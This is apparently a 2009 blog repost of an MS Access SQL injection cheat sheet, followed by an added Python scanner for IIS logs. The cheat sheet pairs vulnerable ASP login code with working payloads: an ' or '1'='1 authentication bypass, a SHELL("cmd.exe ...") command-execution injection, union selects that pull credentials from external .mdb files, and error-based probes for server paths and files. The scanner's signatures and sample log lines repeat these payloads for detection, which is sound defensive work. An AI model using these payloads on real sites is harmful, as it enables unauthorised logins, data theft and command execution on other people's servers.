Saturday, March 7, 2009

Access SQL injection

============================================================================
% Access SQL Injection
% brett.moore_at_security-assessment.com
============================================================================
Nothing new here, move along..
****************************************************************************
% MS Access system tables
****************************************************************************
MSysACEs
MSysObjects
MSysQueries
MSysRelationships
****************************************************************************
% MS Access command execution, (older versions only)
****************************************************************************
[Auth Page Script]
user = request("user")
pass = request("pass")
Set Conn = Server.CreateObject("ADODB.Connection")
Set Rs = Server.CreateObject("ADODB.Recordset")
Conn.Open dsn
SQL = "SELECT * FROM users where pass='"& pass &"' and user='"& user & "'"
rs.open sql,conn
if rs.eof and rs.bof then
' Access Denied
else
' Access Allowed
end if
[Auth Page Bypass]
user = SHELL("cmd.exe /c dir > c:\test.txt")
pass = test
****************************************************************************
% Auth Bypass, Basic
****************************************************************************
[Auth Page Script]
user = request("user")
pass = request("pass")
Set Conn = Server.CreateObject("ADODB.Connection")
Set Rs = Server.CreateObject("ADODB.Recordset")
Conn.Open dsn
SQL = "SELECT * FROM users where pass='"& pass &"' and user='"& user & "'"
rs.open sql,conn
if rs.eof and rs.bof then
' Access Denied
else
' Access Allowed
end if
[Auth Page Bypass]
user = ' or '1'='1
pass = test
****************************************************************************
% Auth Bypass, Simple
****************************************************************************
[Auth Page Script]
user = request("user")
pass = request("pass")
Set Conn = Server.CreateObject("ADODB.Connection")
Set Rs = Server.CreateObject("ADODB.Recordset")
Conn.Open dsn
SQL = "SELECT user,pass FROM users where user='"& user & "'"
rs.open sql,conn
if rs.eof and rs.bof then
' Access Denied
else
if (rs("pass") = pass) then
' Access Allowed
else
' Access Denied
end if
end if
[Auth Page Bypass Using Shares]
user = ' union select name,password from table1 in '\\share\test\test.mdb
pass = password that is set in \\share\test\test.mdb
[Auth Page Bypass Local mdbs]
user = ' union select '0test','0test' from customers in 'C:\winnt\Help\iisHelp\iis\htm\tutorial\eecustmr.mdb'
pass = 0test
[Union Notes]
Remember when using unions the sort order can affect the first record returned.
****************************************************************************
% System Path Disclosure
****************************************************************************
[Sql String]
user = test' union select names from msysobjects in '.
[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database engine cannot open the file 'C:\WINNT\system32'. It is already opened exclusively by another user, or you need permission to view its data.
****************************************************************************
% Verify File Exists
****************************************************************************
[Sql String - non-existent file]
user = test' union select name from msysobjects in '\proof
[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] Could not find file 'C:\proof'.
[Sql String - existent file]
user = test' union select name from msysobjects in '\proof.txt
[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] Unrecognized database format 'C:\proof.txt'.
****************************************************************************
% Verify Path Exists
****************************************************************************
[Sql String - non-existent path]
user = test' union select name from msysobjects in '\nopath\sqlerr
[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] 'C:\nopath\sqlerr' is not a valid path. Make sure that the path name is spelled correctly and that you are connected to the server on which the file resides.
[Sql String - existent path]
user = test' union select name from msysobjects in '\inetpub\sqlerr
[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] Could not find file 'C:\inetpub\sqlerr'.
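As an added defender-side example (not part of the original writeup), a small Python scanner that URL-decodes the cs-uri-query field of IIS W3C log lines and flags the Jet-specific payload shapes shown above: the tautology, union select, the MSys* system tables, the IN '<path>' external-database clause and SHELL(). The log lines are constructed, and the field order is assumed to be date time c-ip cs-method cs-uri-stem cs-uri-query sc-status.

```python
import re
from urllib.parse import unquote_plus

# Signatures derived from the payloads in this writeup; each is matched
# case-insensitively against the URL-decoded query string.
SIGNATURES = {
    "tautology":        re.compile(r"'\s*or\s*'[^']*'\s*=\s*'", re.I),
    "union-select":     re.compile(r"\bunion\s+select\b", re.I),
    "jet-system-table": re.compile(r"\bmsys(aces|objects|queries|relationships)\b", re.I),
    "external-db-in":   re.compile(r"\bfrom\s+\w+\s+in\s+'", re.I),  # ... FROM t IN '<file>'
    "shell-function":   re.compile(r"\bshell\s*\(", re.I),
}

def decode_query(query):
    """URL-decode an IIS cs-uri-query field; IIS writes '-' when there is none."""
    return "" if query == "-" else unquote_plus(query)

def scan_line(line):
    """Return the names of the signatures that fire on one W3C log line."""
    if line.startswith("#"):            # W3C header/directive lines carry no request
        return []
    fields = line.split(" ")
    if len(fields) < 6:
        return []
    query = decode_query(fields[5])     # assumed field order: ... cs-uri-query at index 5
    return [name for name, rx in SIGNATURES.items() if rx.search(query)]

def scan_log(lines):
    """Return (line_no, client_ip, sc_status, findings) for every line that fires.
    A 500 alongside a hit is consistent with the unhandled ODBC errors shown above."""
    hits = []
    for n, line in enumerate(lines, 1):
        found = scan_line(line)
        if found:
            f = line.split(" ")
            hits.append((n, f[2], f[6] if len(f) > 6 else "-", found))
    return hits

# Constructed sample log (not real traffic); hosts and times are placeholders.
SAMPLE_LOG = [
    "2009-03-07 10:14:55 10.0.0.5 POST /login.asp user=alice&pass=secret 200",
    "2009-03-07 10:15:02 10.0.0.9 POST /login.asp user=%27+or+%271%27%3D%271&pass=test 200",
    "2009-03-07 10:15:40 10.0.0.9 POST /login.asp user=test%27+union+select+name+from+msysobjects+in+%27%5Cproof.txt&pass=x 500",
    "2009-03-07 10:16:10 10.0.0.9 POST /login.asp user=SHELL(%22cmd.exe+/c+dir+%3E+c:%5Ctest.txt%22)&pass=test 500",
    "2009-03-07 10:16:30 10.0.0.5 GET /products.asp cat=union+station&id=7 200",  # benign 'union'
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```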
